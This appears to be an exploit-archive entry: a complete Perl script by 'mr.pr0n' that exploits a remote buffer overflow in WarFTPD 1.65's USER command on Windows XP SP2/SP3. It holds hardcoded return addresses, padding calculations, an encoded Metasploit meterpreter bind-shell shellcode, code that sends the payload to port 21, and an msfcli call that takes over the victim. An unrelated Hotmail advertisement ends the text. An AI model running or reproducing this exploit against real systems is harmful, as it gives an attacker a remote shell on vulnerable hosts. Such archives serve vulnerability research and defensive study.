WarFTPD 1.65 Buffer Overflow

2010-06-29T00:00:00
ID PACKETSTORM:91202
Type packetstorm
Reporter mr.pr0n
Modified 2010-06-29T00:00:00

Description

                                        
                                            `  
  
  
# Exploit Title: Remote Buffer Overflow Exploit WarFTPD 1.65 (USER) - Windows XP Pro SP2 / SP3 [English]  
# Date: 26/6/2010  
# Author: mr.pr0n  
# Software Link: [download link if available]  
# Version: WarFTPD 1.65  
# Tested on: Windows XP Pro SP2 / SP3 [English]  
# CVE : [if exists]  
# Code :  
  
#!/usr/bin/perl  
  
use IO::Socket;  
  
print "\n#----[ mr.pr0n ]--------------------------------------------------------#\n";  
print "# Target App: WarFTPD 1.65 (USER). #\n";  
print "# Attack : Remote Buffer Overflow Exploit. #\n";  
print "# Target OS : Windows XP Pro [Service Pack 2 / Service Pack 3]. #\n";  
print "#----------------------------------------[http://www.p0wnbox.com]-------#\n";  
print "\nEnter your target's IP (e.g.: 192.168.0.123)\n";  
print "> ";  
$target=<STDIN>;  
chomp($target);  
print "Enter your target's version of Windows XP Service Pack [2/3] (e.g.: 2)\n";  
print "> ";  
$sp=<STDIN>;  
chomp($sp);  
  
if ($sp == 2) {  
# Lets define the RET, if our target is Windows SP2.  
$RET= "\x72\x93\xab\x71"; # ws2_32.dll push ESP - ret  
}  
elsif ($sp == 3)   
{  
# Lets define the RET, if our target is Windows SP3.  
$RET= "\x53\x2b\xab\x71"; # ws2_32.dll push ESP - ret  
}   
else {  
print "[-] Wrong version of Windows XP Service Pack!\n";  
exit(1);  
}  
  
# We need 485 bytes to override the EIP.  
$junkBytes = "\x41" x 485; # Send 485 "A".  
  
# We need 569 bytes to override the Seh Handler.  
$junkBytes_2 = "\x41" x 84; # Send(485 + 84 =)569 "A".  
  
  
#-----------------------------------------------------------------------------------------------------------------------#   
#[pr0n@megatron ~]$ msfpayload windows/meterpreter/bind_tcp LPORT=4444 R | msfencode -b '\x00\x0a\x0d\x40' -t c #  
#[*] x86/shikata_ga_nai succeeded with size 326 (iteration=1) #  
#-----------------------------------------------------------------------------------------------------------------------#   
  
#-----------------------------------------------#   
# windows/meterpreter/bind_tcp - 326 bytes #  
# http://www.metasploit.com #  
# Encoder: x86/shikata_ga_nai #  
# Bad Characters: \x00, \x0a, \x0d, \x40 #  
# LPORT=4444 #  
#-----------------------------------------------#  
  
$shellcode =   
"\xdb\xd3\x33\xc9\xd9\x74\x24\xf4\xb1\x4b\xba\xab\x11\xad\x09".  
"\x5b\x83\xeb\xfc\x31\x53\x16\x03\x53\x16\xe2\x5e\xed\x45\x80".  
"\xa0\x0e\x96\xf3\x29\xeb\xa7\x21\x4d\x7f\x95\xf5\x06\x2d\x16".  
"\x7d\x4a\xc6\xad\xf3\x42\xe9\x06\xb9\xb4\xc4\x97\x0f\x78\x8a".  
"\x54\x11\x04\xd1\x88\xf1\x35\x1a\xdd\xf0\x72\x47\x2e\xa0\x2b".  
"\x03\x9d\x55\x58\x51\x1e\x57\x8e\xdd\x1e\x2f\xab\x22\xea\x85".  
"\xb2\x72\x43\x91\xfc\x6a\xef\xfd\xdc\x8b\x3c\x1e\x20\xc5\x49".  
"\xd5\xd3\xd4\x9b\x27\x1c\xe7\xe3\xe4\x23\xc7\xe9\xf5\x64\xe0".  
"\x11\x80\x9e\x12\xaf\x93\x65\x68\x6b\x11\x7b\xca\xf8\x81\x5f".  
"\xea\x2d\x57\x14\xe0\x9a\x13\x72\xe5\x1d\xf7\x09\x11\x95\xf6".  
"\xdd\x93\xed\xdc\xf9\xf8\xb6\x7d\x58\xa5\x19\x81\xba\x01\xc5".  
"\x27\xb1\xa0\x12\x51\x98\xac\xd7\x6c\x22\x2d\x70\xe6\x51\x1f".  
"\xdf\x5c\xfd\x13\xa8\x7a\xfa\x54\x83\x3b\x94\xaa\x2c\x3c\xbd".  
"\x68\x78\x6c\xd5\x59\x01\xe7\x25\x65\xd4\xa8\x75\xc9\x87\x08".  
"\x25\xa9\x77\xe1\x2f\x26\xa7\x11\x50\xec\xc0\xe3\x75\x5c\x87".  
"\x01\x89\x72\x0b\x8f\x6f\x1e\xa3\xd9\x38\xb7\x01\x3e\xf1\x20".  
"\x79\x14\xae\xf9\xed\x20\xb9\x3e\x11\xb1\xec\x6c\xbe\x19\x66".  
"\xe7\xac\x9d\x97\xf8\xf8\xb5\xc0\x6f\x76\x54\xa3\x0e\x87\x7d".  
"\x51\xd1\x1d\x7a\xf3\x86\x89\x80\x22\xe0\x15\x7a\x01\x7a\x9f".  
"\xee\xe9\x15\xe0\xfe\xe9\xe5\xb6\x94\xe9\x8d\x6e\xcd\xba\xa8".  
"\x70\xd8\xaf\x60\xe5\xe3\x99\xd5\xae\x8b\x27\x03\x98\x13\xd8".  
"\x66\x18\x6f\x0f\x4f\x9e\x99\x3a\xa3\x62\x6f";  
  
if ($socket = IO::Socket::INET->new  
(PeerAddr => $target,  
# Default FTP Port!  
PeerPort => "21",   
Proto => "TCP"))  
{   
print "\n[*] Sending Buffer at: $target ...\n";  
# This is our Buffer, we are sending a long username with the USER ftp command.  
$exploit = "USER ".$junkBytes.$RET.$junkBytes_2.$shellcode;  
print $socket $exploit."\r\n";  
# Hey, wait only for a sec!  
sleep(1);  
close($socket);  
print "[*] Exploitation Done!\n";  
  
# Connect to the victim with metasploit.  
$command = "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=$target LPORT=4444 E\n";  
system ($command);  
}  
  
else  
{  
print "[-] Connection to $target failed!\n";  
}  
  
# That' all Folks ;)  
  
  
_________________________________________________________________  
Το email σας και πολλά ακόμα εν κινήσει. Αποκτήστε δωρεάν το Windows Live Hotmail.  
https://signup.live.com/signup.aspx?id=60969  
  
  
`